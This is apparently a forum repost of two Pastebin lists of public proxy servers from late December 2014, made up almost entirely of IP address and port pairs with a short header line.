223.83.186.157:8123 223.83.189.48:8123 223.83.196.118:8123 223.83.196.225:8123 223.83.197.116:8123 223.83.201.25:8123 223.83.203.88:8123 223.83.208.162:8123 223.83.210.145:8123 223.83.210.26:8123 223.83.212.208:8123 223.83.217.91:8123 223.83.218.2:8123 223.83.220.105:8123 223.83.220.236:8123 223.83.223.24:8123 223.83.233.9:8123 223.83.234.254:8123 223.83.236.134:8123 223.83.238.221:8123 223.83.26.170:8123 223.83.34.112:8123 223.83.35.80:8123 223.83.38.131:8123 223.83.39.111:8123 223.83.39.205:8123 223.83.39.61:8123 223.83.57.146:8123 223.83.58.96:8123 223.83.60.64:8123 223.83.61.125:8123 223.83.62.112:8123 223.83.77.87:8123 223.83.82.238:8123 223.83.83.169:8123 223.83.85.100:8123 223.83.87.148:8123 223.84.101.202:8123 223.84.103.180:8123 223.84.106.41:8123 223.84.131.90:8123 223.84.132.141:8123 223.84.133.219:8123 223.84.134.75:8123 223.84.134.84:8123 223.84.137.154:8123 223.84.139.196:8123 223.84.139.89:8123 223.84.14.202:8123 223.84.140.120:8123 223.84.142.188:8123 223.84.144.36:8123 223.84.144.90:8123 223.84.145.132:8123 223.84.147.165:8123 223.84.15.51:8123 223.84.151.163:8123 223.84.156.185:8123 223.84.156.192:8123 223.84.156.68:8123 223.84.157.212:8123 223.84.160.174:8123 223.84.162.179:8123 223.84.164.61:8123 223.84.167.116:8123 223.84.168.165:8123 223.84.177.158:8123 223.84.178.45:8123 223.84.179.108:8123 223.84.182.55:8123 223.84.195.4:8123 223.84.2.112:8123 223.84.204.12:8123 223.84.204.185:8123 223.84.208.122:8123 223.84.208.147:8123 223.84.208.249:8123 223.84.209.63:8123 223.84.21.232:8123 223.84.210.81:8123 223.84.212.214:8123 223.84.213.65:8123 223.84.219.131:8123 223.84.221.55:8123 223.84.23.41:8123 223.84.232.65:8123 223.84.235.152:8123 223.84.236.231:8123 223.84.236.69:8123 223.84.237.118:8123 223.84.238.217:8123 223.84.238.73:8123 223.84.24.156:8123 223.84.251.12:8123 223.84.252.103:8123 223.84.254.120:8123 223.84.254.170:8123 223.84.26.28:8123 223.84.28.125:8123 223.84.28.162:8123 223.84.28.60:8123 223.84.28.97:8123 223.84.32.141:8123 
223.84.32.46:8123 223.84.4.206:8123 223.84.4.231:8123 223.84.46.7:8123 223.84.54.205:8123 223.84.7.58:8123 223.84.94.157:8123 223.84.95.49:8123 223.84.99.203:8123 223.85.110.214:8123 223.85.110.5:8123 223.85.111.81:8123 223.85.18.151:8123 223.85.20.181:8123 223.85.21.132:8123 223.85.22.187:8123 223.85.22.19:8123 223.85.22.207:8123 223.85.23.186:8123 223.85.60.182:8123 223.85.60.246:8123 223.85.60.43:8123 223.85.62.8:8123 223.85.67.240:8123 223.85.68.117:8123 223.85.80.7:8123 223.85.81.128:8123 223.85.81.18:8123 223.85.81.23:8123 223.85.94.188:8123 223.85.96.168:8123 223.85.96.5:8123 223.86.10.159:8123 223.86.101.107:8123 223.86.101.173:8123 223.86.101.224:8123 223.86.101.41:8123 223.86.102.131:8123 223.86.102.135:8123 223.86.102.144:8123 223.86.102.15:8123 223.86.102.185:8123 223.86.102.19:8123 223.86.102.72:8123 223.86.103.122:8123 223.86.11.216:8123 223.86.11.27:8123 223.86.11.55:8123 223.86.113.135:8123 223.86.113.211:8123 223.86.113.216:8123 223.86.115.29:8123 223.86.116.9:8123 223.86.118.39:8123 223.86.119.239:8123 223.86.122.249:8123 223.86.127.158:8123 223.86.127.180:8123 223.86.127.27:8123 223.86.128.253:8123 223.86.13.149:8123 223.86.131.21:8123 223.86.134.152:8123 223.86.139.203:8123 223.86.14.120:8123 223.86.15.18:8123 223.86.15.183:8123 223.86.15.9:8123 223.86.15.98:8123 223.86.171.118:8123 223.86.171.173:8123 223.86.171.18:8123 223.86.171.218:8123 223.86.171.28:8123 223.86.209.6:8123 223.86.210.109:8123 223.86.210.123:8123 223.86.210.92:8123 223.86.212.145:8123 223.86.212.234:8123 223.86.213.106:8123 223.86.213.153:8123 223.86.214.118:8123 223.86.214.234:8123 223.86.214.63:8123 223.86.215.12:8123 223.86.215.143:8123 223.86.215.39:8123 223.86.215.43:8123 223.86.215.78:8123 223.86.216.106:8123 223.86.217.139:8123 223.86.218.166:8123 223.86.219.146:8123 223.86.219.213:8123 223.86.223.171:8123 223.86.223.50:8123 223.86.3.28:8123 223.86.34.217:8123 223.86.34.91:8123 223.86.4.5:8123 223.86.43.254:8123 223.86.6.144:8123 223.86.6.194:8123 223.86.6.228:8123 
223.86.6.5:8123 223.86.6.70:8123 223.86.65.10:8123 223.86.66.21:8123 223.86.67.108:8123 223.86.7.178:8123 223.86.7.46:8123 223.86.7.52:8123 223.86.72.191:8123 223.86.73.145:8123 223.86.75.113:8123 223.86.77.148:8123 223.86.79.42:8123 223.86.8.241:8123 223.86.9.121:8123 223.86.9.2:8123 223.86.97.164:8123 223.86.98.160:8123 223.86.99.128:8123 223.86.99.249:8123 223.87.109.142:8123 223.87.110.51:8123 223.87.111.138:8123 223.87.111.159:8123 223.87.111.169:8123 223.87.112.46:8123 223.87.114.224:8123 223.87.116.199:8123 223.87.117.9:8123 223.87.121.85:8123 223.87.185.238:8123 223.87.188.218:8123 223.87.190.138:8123 223.87.190.219:8123 223.87.62.200:8123 223.87.62.229:8123 223.87.75.29:8123 223.94.149.252:8123 223.99.189.102:8090 23.23.204.129:3128 23.252.122.13:3128 24.101.203.105:8800 24.107.70.79:8800 24.32.225.178:8800 27.105.158.68:9064 27.105.22.72:9064 27.116.62.75:8080 27.44.159.176:9999 27.60.97.112:9064 31.220.48.192:48388 31.220.48.202:52743 36.227.165.6:3128 36.227.82.46:9064 36.228.144.102:9064 36.230.53.214:9064 36.230.53.65:9064 36.236.204.55:9064 36.250.69.4:80 36.43.128.25:3128 36.73.14.233:8080 36.73.2.84:8088 36.73.22.11:8080 36.77.184.209:8080 36.80.158.174:8088 36.85.88.167:443 36.86.249.28:9064 37.187.183.12:3128 37.187.97.36:3128 39.1.11.50:9064 39.182.128.245:8123 39.187.41.229:8123 39.187.47.87:8123 39.188.80.89:8123 39.189.64.102:8123 39.190.106.155:8123 41.188.49.159:8080 41.222.196.52:8080 41.234.26.16:8080 41.89.96.43:3128 46.13.230.96:2020 46.21.93.18:8080 46.28.72.252:8080 46.59.77.22:8080 49.205.181.254:9064 49.207.67.140:9064 49.90.21.160:3128 49.94.29.55:3128 5.135.159.166:3128 5.135.6.168:7808 5.135.6.168:8089 5.45.100.141:80 54.160.108.87:3128 54.176.243.237:3128 54.211.2.150:3128 54.223.152.5:3128 54.223.159.87:3128 54.81.39.56:64028 54.88.45.215:8888 54.88.49.14:8888 54.88.81.254:8888 54.88.89.127:8888 58.115.16.5:9064 58.180.17.112:8080 58.220.2.135:80 58.220.2.138:80 58.220.2.140:80 58.246.199.122:3128 58.248.156.54:9999 
58.251.190.68:8888 58.96.184.3:3128 59.104.195.66:9064 59.115.172.171:9064 59.152.235.139:8080 59.188.252.249:3128 59.41.47.147:80 59.60.30.252:3128 59.67.153.132:8118 59.78.160.244:8080 59.78.160.246:8080 59.78.160.247:8080 59.78.160.248:8080 59.92.112.59:9064 59.93.40.163:9064 59.95.231.167:9064 59.95.3.204:9064 60.250.81.118:80 60.250.81.118:8080 60.250.81.97:80 60.55.42.177:3128 60.55.43.3:3128 61.133.51.6:9999 61.135.137.49:9000 61.156.35.2:3128 61.158.173.188:9999 61.163.165.250:9999 61.227.126.218:9064 61.227.212.176:9064 61.228.21.248:9064 61.230.44.216:9064 61.232.6.164:8081 61.234.123.64:8080 61.62.36.151:9064 61.70.163.141:9064 61.91.251.4:8080 62.103.107.9:80 64.31.22.131:7808 64.31.22.131:8089 66.192.33.78:3128 66.192.33.78:8080 67.86.6.210:8800 68.91.163.19:8180 69.197.148.18:7808 69.197.148.18:8089 69.251.23.155:8800 69.84.207.209:8080 71.95.127.103:8800 77.81.105.147:7808 77.81.105.147:8089 77.92.104.115:8888 79.127.123.18:8080 8.225.186.27:3128 80.64.81.34:3128 81.163.88.65:8080 81.196.48.188:8888 82.118.249.190:4444 82.148.195.194:8080 82.208.99.71:3128 82.209.199.214:8080 83.142.1.45:9064 83.180.243.48:9064 83.49.78.77:8080 84.22.32.222:3128 85.249.40.14:9090 85.9.209.244:8080 86.101.235.77:8080 86.132.47.112:3128 88.117.175.30:8080 89.235.9.86:3128 89.34.12.13:8888 90.159.237.155:8080 91.108.139.115:8080 91.121.243.55:80 91.147.196.175:3128 91.204.112.42:8080 91.214.86.154:3128 91.226.108.69:80 91.235.125.3:4444 92.46.125.19:3128 92.62.230.13:8888 94.42.81.51:8080 95.0.35.141:8080 95.140.28.208:3128 95.78.171.155:8088 97.91.171.31:8800 98.178.140.49:8800 98.239.6.79:8800 98.253.230.221:8800 Sursa: 31-12-14 | Free SSL Proxies (3103) - Pastebin.com
  14. 31-12-14 | Fast Proxy Server List (3479) By: gelbeseiten on Dec 30th, 2014. Checked & filtered verified L1/L2/L3 (Timeout 3)
183.207.229.138:80 183.207.229.138:8080 183.207.229.138:8089 183.207.229.138:8090 183.207.229.138:818 183.207.229.138:8888 183.207.229.138:9090 183.207.229.196:80 183.207.229.196:8080 183.207.229.196:8888 183.207.229.196:9090 183.207.229.196:9999 183.207.237.11:80 183.208.214.200:8123 183.208.217.38:8123 183.208.222.143:8123 183.208.32.165:8123 183.208.59.239:8123 183.209.107.212:8123 183.209.111.190:8123 183.209.187.72:8123 183.209.236.220:8123 183.210.0.172:8123 183.210.1.59:8123 183.210.13.125:8123 183.210.251.145:8123 183.210.253.98:8123 183.210.98.241:8123 183.211.31.184:8123 183.211.73.120:8123 183.211.73.203:8123 183.211.73.36:8123 183.211.77.103:8123 183.211.83.180:8123 183.212.113.225:8123 183.212.114.163:8123 183.212.12.171:8123 183.212.12.247:8123 183.212.123.227:8123 183.212.153.84:8123 183.212.67.153:8123 183.213.146.180:8123 183.213.159.192:8123 183.216.106.1:8123 183.216.127.168:8123 183.216.161.157:8123 183.216.163.219:8123 183.216.163.93:8123 183.216.164.53:8123 183.216.165.186:8123 183.216.165.205:8123 183.216.165.84:8123 183.216.166.78:8123 183.216.171.225:8123 183.216.172.121:8123 183.216.172.233:8123 183.216.173.44:8123 183.216.175.42:8123 183.216.178.202:8123 183.216.180.220:8123 183.216.185.186:8123 183.216.187.39:8123 183.216.188.209:8123 183.216.224.244:8123 183.216.225.2:8123 183.216.230.151:8123 183.216.232.3:8123 183.216.234.142:8123 183.216.239.143:8123 183.216.239.171:8123 183.216.239.18:8123 183.216.239.45:8123 183.216.240.180:8123 183.216.242.178:8123 183.216.243.2:8123 183.216.245.45:8123 183.216.246.207:8123 183.216.248.27:8123 183.216.248.28:8123 183.216.251.24:8123 183.216.252.232:8123 183.216.253.82:8123 183.216.99.71:8123 183.217.118.24:8123 183.217.118.31:8123 183.217.137.233:8123 183.217.176.20:8123 183.217.186.123:8123 183.217.187.2:8123 183.217.188.201:8123 183.217.188.93:8123 183.217.194.140:8123 183.217.195.108:8123 183.217.197.167:8123 183.217.197.35:8123 183.217.198.159:8123 183.217.207.191:8123 183.217.212.14:8123 
183.217.228.23:8123 183.217.228.42:8123 183.217.232.112:8123 183.217.240.113:8123 183.217.243.21:8123 183.217.31.206:8123 183.217.43.219:8123 183.217.62.150:8123 183.217.66.91:8123 183.217.96.79:8123 183.218.106.154:8123 183.218.13.175:8123 183.218.48.225:8123 183.218.86.239:8123 183.218.87.28:8123 183.218.89.113:8123 183.219.102.248:8123 183.219.102.46:8123 183.219.138.73:8123 183.219.140.140:8123 183.219.141.219:8123 183.219.144.138:8123 183.219.144.206:8123 183.219.146.105:8123 183.219.147.192:8123 183.219.149.59:8123 183.219.150.119:8123 183.219.150.175:8123 183.219.152.217:8123 183.219.154.250:8123 183.219.155.196:8123 183.219.156.124:8123 183.219.157.176:8123 183.219.158.243:8123 183.219.158.49:8123 183.219.160.95:8123 183.219.163.70:8123 183.219.168.128:8123 183.219.174.112:8123 183.219.174.142:8123 183.219.248.92:8123 183.219.27.26:8123 183.219.28.110:8123 183.219.28.240:8123 183.219.3.157:8123 183.219.3.210:8123 183.219.30.172:8123 183.219.32.32:8123 183.219.4.231:8123 183.219.46.154:8123 183.219.50.132:8123 183.219.50.52:8123 183.219.50.58:8123 183.219.52.31:8123 183.219.55.106:8123 183.219.58.123:8123 183.219.58.241:8123 183.219.59.114:8123 183.219.67.157:8123 183.219.7.243:8123 183.219.82.120:8123 183.219.82.136:8123 183.219.84.50:8123 183.219.87.114:8123 183.219.88.60:8123 183.219.89.96:8123 183.219.91.227:8123 183.219.91.97:8123 183.219.92.230:8123 183.219.93.10:8123 183.219.93.196:8123 183.219.94.114:8123 183.219.94.253:8123 183.220.240.149:8123 183.221.160.38:8123 183.222.156.150:8123 183.222.171.215:8123 183.222.250.121:8123 183.222.252.243:8123 183.223.10.50:8123 183.223.15.7:8123 183.223.170.8:8123 183.223.172.230:8123 183.223.192.147:8123 183.223.192.95:8123 183.223.194.27:8123 183.223.194.6:8123 183.223.195.130:8123 183.223.196.184:8123 183.223.197.197:8123 183.223.197.2:8123 183.223.197.249:8123 183.223.197.253:8123 183.223.198.163:8123 183.223.200.61:8123 183.223.201.171:8123 183.223.201.188:8123 183.223.204.13:8123 183.223.204.217:8123 
183.223.208.238:8123 183.223.211.34:8123 183.223.215.210:8123 183.223.242.126:8123 183.223.243.55:8123 183.223.33.125:8123 183.223.34.154:8123 183.223.36.35:8123 183.223.40.126:8123 183.223.40.243:8123 183.223.9.11:8123 183.224.1.30:80 183.224.99.148:8123 183.227.216.80:8123 183.227.217.139:8123 183.227.217.19:8123 183.227.219.83:8123 183.228.109.119:8123 183.228.109.23:8123 183.228.109.39:8123 183.228.11.204:8123 183.228.123.214:8123 183.228.139.29:8123 183.228.156.160:8123 183.228.156.6:8123 183.228.177.44:8123 183.228.183.117:8123 183.228.198.184:8123 183.228.201.184:8123 183.228.74.239:8123 183.230.53.45:8123 183.230.53.62:8123 183.230.53.65:8123 183.31.218.177:9999 183.57.78.61:8085 183.60.109.210:8888 183.60.109.23:8888 183.60.109.41:8888 183.60.187.55:80 183.60.44.136:88 183.62.172.50:9999 183.66.79.93:8118 183.69.177.49:80 183.70.34.76:8118 183.82.90.133:9064 183.83.115.161:9064 183.83.176.151:9064 183.83.251.206:9064 183.87.231.166:9064 183.89.72.30:3128 183.89.74.140:3128 183.95.152.141:80 183.95.152.141:8080 183.95.152.141:8091 184.168.134.219:80 185.28.193.95:8080 185.30.147.197:8080 185.37.226.106:19350 185.37.226.184:18080 185.37.226.184:19350 185.72.156.19:7808 186.101.82.74:3128 186.109.91.3:8080 186.138.66.241:8080 186.14.55.28:9064 186.188.123.90:9064 186.188.125.108:9064 186.206.227.138:8080 186.213.197.74:8080 186.214.137.76:8080 186.214.147.241:8080 186.215.80.218:3128 186.215.80.219:3128 186.227.164.142:9064 186.232.160.42:8080 186.244.53.48:8080 186.67.97.35:8081 186.88.1.45:8080 186.88.103.118:8080 186.88.110.3:8080 186.88.164.186:9064 186.88.168.27:9064 186.88.168.38:9064 186.88.170.194:9064 186.88.172.97:8080 186.88.182.129:8080 186.88.210.44:9064 186.88.230.126:8080 186.88.231.104:9064 186.88.231.48:8080 186.88.232.71:8080 186.88.241.240:8080 186.88.244.153:8080 186.88.250.217:9064 186.88.3.105:9064 186.88.33.35:9064 186.88.37.106:8080 186.88.40.252:8080 186.88.42.109:8080 186.88.87.210:9064 186.88.88.200:8080 186.88.92.166:9064 
186.88.93.160:9064 186.89.114.171:9064 186.89.114.200:9064 186.89.116.53:8080 186.89.120.15:8080 186.89.125.213:9064 186.89.148.140:8080 186.89.16.157:8080 186.89.16.67:9064 186.89.179.17:8080 186.89.187.155:8080 186.89.190.164:8080 186.89.213.189:9064 186.89.217.106:9064 186.89.220.192:8080 186.89.221.208:9064 186.89.222.230:8080 186.89.23.172:9064 186.89.242.5:8080 186.89.246.243:8080 186.89.255.32:8080 186.89.27.47:8080 186.89.55.37:8080 186.89.85.147:9064 186.89.86.120:9064 186.89.87.57:8080 186.89.98.246:8080 186.9.108.3:9064 186.90.101.243:8080 186.90.108.139:9064 186.90.114.254:8080 186.90.116.128:8080 186.90.121.242:8080 186.90.123.161:9064 186.90.148.78:8080 186.90.155.21:9064 186.90.243.229:8080 186.90.255.249:9064 186.90.28.228:9064 186.90.59.134:9064 186.90.72.49:9064 186.90.82.177:9064 186.90.86.181:9064 186.90.88.98:9064 186.91.126.18:9064 186.91.126.247:8080 186.91.129.223:9064 186.91.134.100:9064 186.91.160.55:9064 186.91.166.69:9064 186.91.199.71:9064 186.91.205.169:9064 186.91.207.83:9064 186.91.226.254:9064 186.91.233.41:8080 186.91.235.205:8080 186.91.238.60:8080 186.91.243.197:9064 186.91.250.8:8080 186.91.251.149:8080 186.91.251.55:8080 186.91.44.228:8080 186.91.63.240:9064 186.91.64.42:8080 186.91.65.22:9064 186.91.70.17:8080 186.91.78.232:8080 186.91.93.7:9064 186.91.94.244:8080 186.92.113.36:9064 186.92.118.8:9064 186.92.128.8:8080 186.92.130.154:9064 186.92.152.23:8080 186.92.163.27:8080 186.92.185.206:8080 186.92.188.130:9064 186.92.190.62:8080 186.92.218.129:8080 186.92.23.113:8080 186.92.24.186:8080 186.92.240.48:8080 186.92.248.120:8080 186.92.25.16:9064 186.92.34.210:8080 186.92.52.50:9064 186.92.53.253:8080 186.92.57.190:8080 186.92.70.9:8080 186.92.82.152:8080 186.92.87.41:9064 186.92.94.140:9064 186.92.94.5:8080 186.93.105.173:8080 186.93.109.17:8080 186.93.111.219:8080 186.93.121.187:8080 186.93.124.133:8080 186.93.129.108:8080 186.93.168.93:8080 186.93.171.28:8080 186.93.172.6:8080 186.93.186.198:8080 186.93.193.70:9064 
186.93.195.153:8080 186.93.195.164:8080 186.93.221.111:8080 186.93.231.240:8080 186.93.235.237:9064 186.93.239.159:9064 186.93.249.161:8080 186.93.25.57:8080 186.94.112.178:9064 186.94.117.60:9064 186.94.119.250:9064 186.94.134.72:8080 186.94.148.138:8080 186.94.148.171:8080 186.94.148.217:9064 186.94.163.47:8080 186.94.179.142:8080 186.94.179.72:9064 186.94.186.135:9064 186.94.19.131:9064 186.94.20.132:9064 186.94.219.208:9064 186.94.232.7:9064 186.94.237.186:8080 186.94.24.239:9064 186.94.250.31:9064 186.94.26.73:8080 186.94.30.196:9064 186.94.31.12:9064 186.94.32.212:9064 186.94.36.151:8080 186.94.48.11:9064 186.94.49.218:9064 186.94.54.214:8080 186.94.56.59:9064 186.94.57.101:8080 186.94.65.111:8080 186.94.82.65:8080 186.95.0.113:9064 186.95.108.34:8080 186.95.12.35:9064 186.95.134.251:8080 186.95.137.11:9064 186.95.15.233:9064 186.95.18.191:8080 186.95.183.129:8080 186.95.190.71:8080 186.95.2.225:9064 186.95.210.247:8080 186.95.213.251:8080 186.95.225.10:9064 186.95.230.106:8080 186.95.235.184:8080 186.95.239.215:9064 186.95.243.244:8080 186.95.244.164:9064 186.95.34.212:8080 186.95.47.128:8080 186.95.48.248:9064 186.95.69.202:8080 186.95.82.223:9064 186.95.83.201:8080 186.95.86.21:8080 186.95.87.159:8080 186.95.9.177:9064 187.113.21.188:9064 187.120.34.25:3128 187.122.166.154:9064 187.14.200.174:8080 187.157.45.114:8080 187.16.44.228:8080 187.189.45.128:8080 187.20.209.49:9064 187.36.195.26:9064 187.44.14.156:8080 187.44.158.206:8080 187.45.63.253:8080 187.53.35.105:8080 187.54.122.66:8080 187.57.209.30:9064 187.60.142.156:8080 187.61.215.127:8080 187.63.204.177:9064 187.70.162.193:9064 187.74.160.179:9064 187.74.193.202:9064 187.74.2.62:9064 187.74.92.138:9064 187.75.147.132:3128 187.75.166.80:3130 187.78.24.207:9064 187.86.20.34:8080 187.91.90.242:9064 188.132.226.2:80 188.137.99.6:3128 188.226.145.143:3128 188.40.147.101:2020 189.13.118.92:8080 189.17.66.162:8080 189.201.241.233:8080 189.29.125.192:9064 189.35.43.234:9064 189.39.139.247:9064 
189.58.248.110:3128 189.68.124.46:9064 189.69.120.216:9064 189.69.80.63:9064 189.7.98.74:9064 189.73.224.190:8080 189.79.171.201:9064 189.85.29.110:8080 190.0.241.86:80 190.0.241.86:8080 190.104.157.71:3128 190.109.177.229:80 190.12.86.211:3128 190.12.86.213:3128 190.121.148.192:8080 190.121.148.242:8080 190.121.230.148:8080 190.123.187.189:9064 190.136.1.7:8080 190.140.172.164:80 190.142.143.135:9064 190.153.38.152:8080 190.183.48.233:9064 190.198.121.130:8080 190.198.134.191:8080 190.198.139.166:9064 190.198.147.171:8080 190.198.148.134:8080 190.198.150.187:8080 190.198.154.248:8080 190.198.155.226:8080 190.198.16.48:8080 190.198.176.158:9064 190.198.177.232:8080 190.198.181.161:8080 190.198.186.61:8080 190.198.191.164:8080 190.198.22.20:8080 190.198.229.171:8080 190.198.238.142:8080 190.198.246.235:9064 190.198.251.164:8080 190.198.254.72:9064 190.198.29.63:9064 190.198.70.88:9064 190.198.88.131:9064 190.198.93.12:8080 190.198.93.124:8080 190.198.94.215:8080 190.199.195.109:8080 190.199.196.229:9064 190.199.199.185:9064 190.199.217.96:8080 190.199.248.164:8080 190.199.250.219:9064 190.199.41.123:8080 190.199.44.94:9064 190.199.57.66:8080 190.199.59.235:8080 190.199.60.16:8080 190.199.88.195:8080 190.199.91.205:8080 190.199.93.235:9064 190.199.94.215:8080 190.200.134.248:8080 190.200.151.137:9064 190.200.157.182:8080 190.200.208.154:8080 190.200.21.181:9064 190.200.24.38:8080 190.200.25.132:8080 190.200.31.141:8080 190.200.31.224:8080 190.201.100.130:9064 190.201.100.20:8080 190.201.107.108:9064 190.201.107.76:8080 190.201.108.5:9064 190.201.108.80:9064 190.201.121.15:8080 190.201.123.224:8080 190.201.133.72:8080 190.201.140.139:9064 190.201.164.99:8080 190.201.175.103:8080 190.201.219.33:8080 190.201.43.31:9064 190.201.7.17:9064 190.201.96.198:9064 190.201.96.85:9064 190.202.214.247:9064 190.202.216.116:8080 190.202.217.209:8080 190.202.220.214:8080 190.202.241.165:8080 190.203.128.111:9064 190.203.132.125:9064 190.203.141.15:9064 190.203.146.241:8080 
190.203.146.7:8080 190.203.147.36:8080 190.203.162.121:9064 190.203.168.12:8080 190.203.176.160:8080 190.203.245.63:9064 190.203.250.90:8080 190.203.251.245:8080 190.203.251.61:9064 190.203.35.198:9064 190.203.74.120:9064 190.203.97.190:9064 190.204.1.103:9064 190.204.100.201:8080 190.204.103.87:8080 190.204.105.25:9064 190.204.112.201:8080 190.204.129.118:8080 190.204.146.154:8080 190.204.169.126:9064 190.204.173.158:8080 190.204.175.211:9064 190.204.18.154:9064 190.204.224.140:9064 190.204.233.103:8080 190.204.39.28:8080 190.204.42.132:9064 190.204.43.206:9064 190.204.47.130:9064 190.204.51.54:9064 190.204.53.22:8080 190.204.6.7:8080 190.204.66.161:9064 190.204.76.167:8080 190.204.84.222:9064 190.204.94.235:9064 190.204.96.197:9064 190.204.98.145:8080 190.205.115.221:8080 190.205.149.164:8080 190.205.157.253:8080 190.205.224.221:8080 190.205.4.140:8080 190.206.10.37:8080 190.206.11.141:9064 190.206.115.196:8080 190.206.12.16:9064 190.206.141.216:8080 190.206.149.119:9064 190.206.150.124:8080 190.206.157.124:9064 190.206.176.92:9064 190.206.212.108:8080 190.206.222.28:8080 190.206.222.79:8080 190.206.223.218:9064 190.206.235.156:9064 190.206.243.148:8080 190.206.252.76:8080 190.206.45.16:9064 190.206.6.139:8080 190.206.62.194:9064 190.206.85.148:8080 190.206.87.25:9064 190.207.106.98:8080 190.207.129.239:8080 190.207.143.22:9064 190.207.154.146:9064 190.207.154.179:8080 190.207.156.22:8080 190.207.159.95:9064 190.207.172.27:8080 190.207.198.135:9064 190.207.199.228:9064 190.207.207.182:8080 190.207.229.227:8080 190.207.233.54:9064 190.207.234.125:8080 190.207.237.182:9064 190.207.32.47:8080 190.207.69.120:9064 190.233.57.239:8080 190.235.148.218:3128 190.235.61.68:3128 190.36.100.254:9064 190.36.16.173:9064 190.36.216.206:9064 190.36.216.52:9064 190.36.217.126:9064 190.36.23.243:8080 190.36.81.209:9064 190.37.0.247:9064 190.37.0.254:9064 190.37.105.70:9064 190.37.110.135:9064 190.37.160.183:8080 190.37.172.185:8080 190.37.208.84:8080 190.37.35.100:9064 
190.37.43.4:9064 190.37.68.231:8080 190.37.69.159:9064 190.37.71.168:9064 190.37.76.72:9064 190.37.79.181:8080 190.37.8.203:8080 190.37.87.20:9064 190.38.16.159:9064 190.38.16.62:9064 190.38.166.155:9064 190.38.179.117:9064 190.38.186.233:8080 190.38.190.77:8080 190.38.220.244:9064 190.38.29.136:9064 190.38.29.32:8080 190.38.32.92:9064 190.38.54.243:9064 190.38.92.73:8080 190.39.118.111:9064 190.39.129.133:9064 190.39.137.78:8080 190.39.151.189:9064 190.39.172.212:8080 190.39.201.66:9064 190.39.202.160:9064 190.39.229.133:9064 190.39.243.49:8080 190.39.85.95:8080 190.72.115.225:8080 190.72.142.151:8080 190.72.153.108:9064 190.72.158.70:8080 190.72.182.187:8080 190.72.185.136:9064 190.72.37.136:8080 190.72.4.216:9064 190.72.45.108:9064 190.72.7.56:8080 190.73.104.85:9064 190.73.114.213:9064 190.73.115.193:9064 190.73.127.88:8080 190.73.130.219:9064 190.73.140.153:8080 190.73.143.29:8080 190.73.171.221:9064 190.73.172.251:9064 190.73.224.43:9064 190.73.251.191:8080 190.73.42.70:9064 190.73.44.57:8080 190.73.96.224:9064 190.73.98.196:8080 190.74.116.26:9064 190.74.117.103:9064 190.74.119.189:9064 190.74.195.1:9064 190.74.215.50:8080 190.74.223.165:8080 190.75.111.106:9064 190.75.114.181:9064 190.75.138.95:8080 190.75.237.50:9064 190.75.44.191:9064 190.75.47.3:8080 190.75.62.24:8080 190.75.78.168:9064 190.75.83.81:8080 190.75.86.124:8080 190.77.125.240:8080 190.77.125.66:9064 190.77.147.8:9064 190.77.167.202:9064 190.77.179.224:8080 190.77.181.187:9064 190.77.182.8:8080 190.77.185.70:9064 190.77.187.234:9064 190.77.215.152:9064 190.77.215.250:8080 190.77.221.114:8080 190.77.249.98:8080 190.77.252.118:8080 190.77.252.165:9064 190.77.30.188:9064 190.77.80.136:8080 190.77.80.79:9064 190.77.83.110:9064 190.77.83.144:8080 190.77.83.78:8080 190.78.154.143:9064 190.78.16.155:8080 190.78.161.93:9064 190.78.172.112:8080 190.78.172.31:8080 190.78.175.230:8080 190.78.177.97:9064 190.78.18.7:8080 190.78.183.52:8080 190.78.19.221:8080 190.78.190.56:8080 190.78.21.57:8080 
190.78.218.44:9064 190.78.30.48:9064 190.78.51.113:8080 190.78.60.21:9064 190.78.62.131:9064 190.78.63.79:8080 190.78.79.99:9064 190.78.80.91:8080 190.78.81.248:9064 190.78.89.244:9064 190.78.90.189:8080 190.78.91.38:8080 190.78.93.215:8080 190.79.132.253:8080 190.79.153.67:9064 190.79.154.10:8080 190.79.155.196:9064 190.79.156.172:9064 190.79.158.107:8080 190.79.206.126:8080 190.79.21.146:8080 190.79.29.31:9064 190.79.44.179:9064 190.97.234.194:8080 190.97.234.52:8080 191.240.152.241:8080 192.3.91.99:8080 193.30.251.254:8080 194.106.166.1:8080 194.135.220.18:8081 195.113.196.29:80 195.246.54.7:8080 195.88.0.220:8080 197.210.252.44:80 197.210.252.44:8080 198.204.255.10:808 198.50.149.189:8888 198.71.193.136:80 198.71.196.90:80 198.81.200.145:80 198.98.103.160:3128 199.200.120.140:7808 199.200.120.140:8089 200.103.59.24:8080 200.109.131.32:9064 200.109.144.172:8080 200.109.152.249:8080 200.109.177.133:9064 200.109.181.242:9064 200.109.205.174:8080 200.109.206.89:9064 200.109.35.246:8080 200.109.45.69:8080 200.121.140.150:8080 200.214.132.19:3128 200.242.145.3:3128 200.29.67.28:80 200.46.94.202:3128 200.8.119.158:9064 200.8.217.5:9064 200.8.93.22:9064 200.84.100.78:8080 200.84.128.177:8080 200.84.133.140:9064 200.84.141.212:9064 200.84.142.210:9064 200.84.145.113:9064 200.84.149.167:8080 200.84.193.4:8080 200.84.194.29:9064 200.84.246.180:9064 200.84.251.183:9064 200.84.254.30:8080 200.84.37.124:9064 200.84.56.197:9064 200.84.68.94:9064 200.84.70.243:9064 200.84.84.219:9064 200.90.42.206:9064 200.93.109.137:8080 200.93.112.204:8080 200.93.116.106:8080 200.93.119.213:8080 200.93.13.215:8080 200.93.17.119:8080 200.93.17.16:8080 200.93.29.245:8080 200.93.31.207:9064 200.93.81.64:9064 200.99.150.70:8080 201.13.66.196:9064 201.130.171.130:8080 201.14.253.38:8080 201.159.17.228:8080 201.186.209.192:9064 201.188.22.116:9064 201.208.13.164:8080 201.208.133.19:9064 201.208.14.141:8080 201.208.143.23:8080 201.208.161.177:9064 201.208.162.225:9064 201.208.171.99:9064 
